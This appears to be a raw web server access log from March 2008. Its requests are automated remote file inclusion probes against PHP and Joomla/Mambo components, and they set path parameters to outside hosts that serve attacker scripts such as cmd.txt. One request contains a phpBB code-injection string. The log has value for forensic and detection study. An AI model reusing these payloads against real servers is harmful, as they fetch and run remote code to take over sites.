160.99.12.231 - - [23/Mar/2008:18:40:22 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.65"
160.99.12.231 - - [23/Mar/2008:18:40:22 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.65"
203.172.184.72 - - [23/Mar/2008:18:42:43 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
203.172.184.72 - - [23/Mar/2008:18:42:43 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
85.234.144.44 - - [23/Mar/2008:18:44:17 -0700] "GET /logs/access_log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.808"
85.234.144.44 - - [23/Mar/2008:18:44:18 -0700] "GET /?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.808"
85.234.144.44 - - [23/Mar/2008:18:44:18 -0700] "GET /logs/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 200 6081 "-" "libwww-perl/5.808"
85.234.144.44 - - [23/Mar/2008:18:44:37 -0700] "GET /logs/error_log/?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:45:43 -0700] "GET /logs/access_log.20080203/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.windsornw.com/errors.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
66.7.207.104 - - [23/Mar/2008:18:45:43 -0700] "GET /logs/access_log.20080203/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
58.65.239.170 - - [23/Mar/2008:18:47:12 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 491520 "-" "-"
213.247.44.96 - - [23/Mar/2008:18:47:41 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
87.117.225.155 - - [23/Mar/2008:18:49:03 -0700] "GET /logs/access_log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
87.117.225.155 - - [23/Mar/2008:18:49:03 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
195.137.139.73 - - [23/Mar/2008:18:49:43 -0700] "GET /logs/error_log.20080217/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 290 "-" "libwww-perl/5.79"
195.137.139.73 - - [23/Mar/2008:18:49:44 -0700] "GET /logs/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
217.110.209.230 - - [23/Mar/2008:18:50:41 -0700] "GET /logs/access_log.20080127/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
217.110.209.230 - - [23/Mar/2008:18:50:45 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
217.110.209.230 - - [23/Mar/2008:18:50:49 -0700] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.65"
195.137.139.73 - - [23/Mar/2008:18:51:06 -0700] "GET /logs/error_log/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 281 "-" "libwww-perl/5.79"
66.36.241.244 - - [23/Mar/2008:18:51:34 -0700] "GET /index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
74.50.105.133 - - [23/Mar/2008:18:54:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:18:54:59 -0700] "GET //skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.808"
85.119.152.13 - - [23/Mar/2008:18:55:01 -0700] "GET /index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 215 "-" "libwww-perl/5.48"
87.230.15.10 - - [23/Mar/2008:18:56:26 -0700] "GET /logs/access_log.20080203/auto.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:18:56:26 -0700] "GET /auto.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 226 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:18:56:27 -0700] "GET /logs/auto.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
72.36.235.74 - - [23/Mar/2008:18:59:34 -0700] "GET /index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
74.52.2.130 - - [23/Mar/2008:18:59:57 -0700] "GET /index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
72.30.216.102 - - [23/Mar/2008:19:00:24 -0700] "GET /logs/access_log.20080203 HTTP/1.0" 200 540672 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.234.144.44 - - [23/Mar/2008:19:00:30 -0700] "GET /logs/access_log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.808"
85.234.144.44 - - [23/Mar/2008:19:00:31 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
85.234.144.44 - - [23/Mar/2008:19:00:31 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
85.234.144.44 - - [23/Mar/2008:19:00:47 -0700] "GET /logs/error_log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
160.99.12.231 - - [23/Mar/2008:19:01:20 -0700] "GET /logs/access_log.20080203/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.65"
64.185.237.140 - - [23/Mar/2008:19:02:00 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 247 "-" "libwww-perl/5.808"
64.185.237.140 - - [23/Mar/2008:19:02:00 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 242 "-" "libwww-perl/5.808"
87.230.15.10 - - [23/Mar/2008:19:02:31 -0700] "GET /logs/access_log/auto.php?inc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
70.86.111.2 - - [23/Mar/2008:19:02:49 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gomaka.com/test.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
70.86.111.2 - - [23/Mar/2008:19:02:50 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gomaka.com/test.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.28.112.51 - - [23/Mar/2008:19:03:09 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
67.28.112.51 - - [23/Mar/2008:19:03:10 -0700] "GET //skin/zero_vote/error.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
87.117.225.155 - - [23/Mar/2008:19:04:11 -0700] "GET /logs/access_log.20080203/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.808"
72.32.199.201 - - [23/Mar/2008:19:04:56 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
72.32.199.201 - - [23/Mar/2008:19:04:57 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
189.20.228.26 - - [23/Mar/2008:19:05:18 -0700] "GET /logs/include/write.php?dir=http://www.arquivosweb.tecnologia.ws/cmd.gif?&cmd=id HTTP/1.1" 404 228 "-" "Mozilla/3.0 (compatible; Indy Library)"
66.7.207.104 - - [23/Mar/2008:19:05:33 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.808"
72.30.216.92 - - [23/Mar/2008:19:06:28 -0700] "GET /logs/access_log.20080127 HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
58.65.239.170 - - [23/Mar/2008:19:07:22 -0700] "GET /logs/access_log.20080210 HTTP/1.1" 200 851968 "-" "-"
217.110.209.230 - - [23/Mar/2008:19:09:19 -0700] "GET /logs/error_log.20080210/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.65"
72.52.195.135 - - [23/Mar/2008:19:09:33 -0700] "GET /logs/index.php?option=com_swmenumaker&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
72.52.195.135 - - [23/Mar/2008:19:09:33 -0700] "GET /index.php?option=com_swmenumaker&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
87.118.102.153 - - [23/Mar/2008:19:10:01 -0700] "GET /index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
87.118.102.153 - - [23/Mar/2008:19:10:01 -0700] "GET /logs/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
66.162.134.138 - - [23/Mar/2008:19:10:27 -0700] "GET /logs/access_log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.808"
66.162.134.138 - - [23/Mar/2008:19:10:27 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
66.162.134.138 - - [23/Mar/2008:19:10:27 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
66.36.241.244 - - [23/Mar/2008:19:11:14 -0700] "GET /logs/access_log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
66.36.241.244 - - [23/Mar/2008:19:11:14 -0700] "GET /logs/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
66.36.241.244 - - [23/Mar/2008:19:11:20 -0700] "GET /logs/error_log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
74.50.105.133 - - [23/Mar/2008:19:11:22 -0700] "GET /logs/error_log.20080127//skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
72.9.145.111 - - [23/Mar/2008:19:12:33 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
72.9.145.111 - - [23/Mar/2008:19:12:33 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
74.50.105.133 - - [23/Mar/2008:19:13:35 -0700] "GET /logs/error_log.20080224//skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.808"
203.72.181.15 - - [23/Mar/2008:19:13:59 -0700] "GET /logs/access_log/config.php?path_to_root=http://www.prodesign-wedel.de//cache/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
62.75.208.244 - - [23/Mar/2008:19:14:49 -0700] "GET /logs/error_log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.803"
62.75.208.244 - - [23/Mar/2008:19:14:49 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
62.75.208.244 - - [23/Mar/2008:19:14:49 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
85.214.56.123 - - [23/Mar/2008:19:14:49 -0700] "GET /logs/access_log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
85.214.56.123 - - [23/Mar/2008:19:14:50 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
85.214.56.123 - - [23/Mar/2008:19:14:50 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
62.75.208.244 - - [23/Mar/2008:19:14:50 -0700] "GET /logs/access_log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://stmikx.freehoxt.com/Sekip/id.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.803"
74.95.82.113 - - [23/Mar/2008:19:16:06 -0700] "GET /logs/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
74.95.82.113 - - [23/Mar/2008:19:16:07 -0700] "GET /index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/boo.do??? HTTP/1.1" 404 227 "-" "Microsoft Pocket Internet Explorer/0.6"
219.166.61.155 - - [23/Mar/2008:19:16:07 -0700] "GET /logs/access_log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
219.166.61.155 - - [23/Mar/2008:19:16:08 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
219.166.61.155 - - [23/Mar/2008:19:16:08 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
195.137.139.73 - - [23/Mar/2008:19:16:15 -0700] "GET /logs/access_log/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
195.137.139.73 - - [23/Mar/2008:19:16:16 -0700] "GET /logs/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
195.137.139.73 - - [23/Mar/2008:19:16:35 -0700] "GET /logs/error_log/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
195.137.139.73 - - [23/Mar/2008:19:16:35 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 286 "-" "libwww-perl/5.79"
61.250.95.201 - - [23/Mar/2008:19:16:36 -0700] "GET /logs/access_log.20080120/admincp/auth/checklogin.php?cfgProgDir=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
61.250.95.201 - - [23/Mar/2008:19:16:36 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
61.250.95.201 - - [23/Mar/2008:19:16:37 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
194.126.239.14 - - [23/Mar/2008:19:17:30 -0700] "GET /logs/access_log.2008020316//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
194.126.239.14 - - [23/Mar/2008:19:17:30 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
194.126.239.14 - - [23/Mar/2008:19:17:30 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.803"
194.126.239.14 - - [23/Mar/2008:19:17:54 -0700] "GET /logs/access_log.20080120//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
67.195.44.110 - - [23/Mar/2008:19:18:01 -0700] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.44.77 - - [23/Mar/2008:19:18:04 -0700] "GET /logs/error_log.20080113 HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.119.152.13 - - [23/Mar/2008:19:18:24 -0700] "GET /logs/access_log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 219 "-" "libwww-perl/5.48"
85.119.152.13 - - [23/Mar/2008:19:18:24 -0700] "GET /logs/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 220 "-" "libwww-perl/5.48"
203.146.251.123 - - [23/Mar/2008:19:18:27 -0700] "GET /logs/access_log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 281 "-" "libwww-perl/5.65"
203.146.251.123 - - [23/Mar/2008:19:18:28 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
203.146.251.123 - - [23/Mar/2008:19:18:29 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
85.119.152.13 - - [23/Mar/2008:19:18:48 -0700] "GET /logs/error_log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 218 "-" "libwww-perl/5.48"
81.2.252.15 - - [23/Mar/2008:19:20:03 -0700] "GET /logs/error_log/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
81.2.252.15 - - [23/Mar/2008:19:20:03 -0700] "GET /logs/error_log/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
81.2.252.15 - - [23/Mar/2008:19:20:04 -0700] "GET /modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
81.2.252.15 - - [23/Mar/2008:19:20:04 -0700] "GET /modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
81.2.252.15 - - [23/Mar/2008:19:20:04 -0700] "GET /logs/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
81.2.252.15 - - [23/Mar/2008:19:20:04 -0700] "GET /logs/modify.php?dir_module=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
203.146.251.123 - - [23/Mar/2008:19:20:10 -0700] "GET /logs/access_log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 281 "-" "libwww-perl/5.65"
203.146.251.123 - - [23/Mar/2008:19:20:11 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
203.146.251.123 - - [23/Mar/2008:19:20:12 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
194.126.239.14 - - [23/Mar/2008:19:20:34 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.803"
74.53.160.98 - - [23/Mar/2008:19:20:51 -0700] "GET /logs/error_log.20080224//skin/zero_vote/error.php?dir=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
74.53.160.98 - - [23/Mar/2008:19:20:51 -0700] "GET //skin/zero_vote/error.php?dir=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
74.53.160.98 - - [23/Mar/2008:19:20:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
203.146.251.123 - - [23/Mar/2008:19:21:09 -0700] "GET /logs/error_log.20080217/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 289 "-" "libwww-perl/5.65"
67.28.112.51 - - [23/Mar/2008:19:21:29 -0700] "GET /logs/error_log.20080127//skin/zero_vote/error.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
76.88.24.0 - - [23/Mar/2008:19:22:41 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
203.146.251.123 - - [23/Mar/2008:19:22:53 -0700] "GET /logs/error_log.20080217/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 289 "-" "libwww-perl/5.65"
74.52.2.130 - - [23/Mar/2008:19:23:24 -0700] "GET /logs/access_log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 231 "-" "libwww-perl/5.808"
74.52.2.130 - - [23/Mar/2008:19:23:24 -0700] "GET /logs/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
74.52.2.130 - - [23/Mar/2008:19:23:33 -0700] "GET /logs/error_log/index.php?option=com_uhp&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
87.230.15.10 - - [23/Mar/2008:19:24:02 -0700] "GET /logs/error_log.20080127//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:19:24:02 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
87.230.15.10 - - [23/Mar/2008:19:24:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
64.185.237.140 - - [23/Mar/2008:19:24:55 -0700] "GET /logs/access_log.20080203//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 267 "-" "libwww-perl/5.808"
67.28.112.51 - - [23/Mar/2008:19:25:13 -0700] "GET /logs/error_log.20080224//skin/zero_vote/error.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
64.185.237.140 - - [23/Mar/2008:19:25:19 -0700] "GET /logs/access_log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
76.88.24.0 - - [23/Mar/2008:19:25:43 -0700] "GET /logs/access_log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
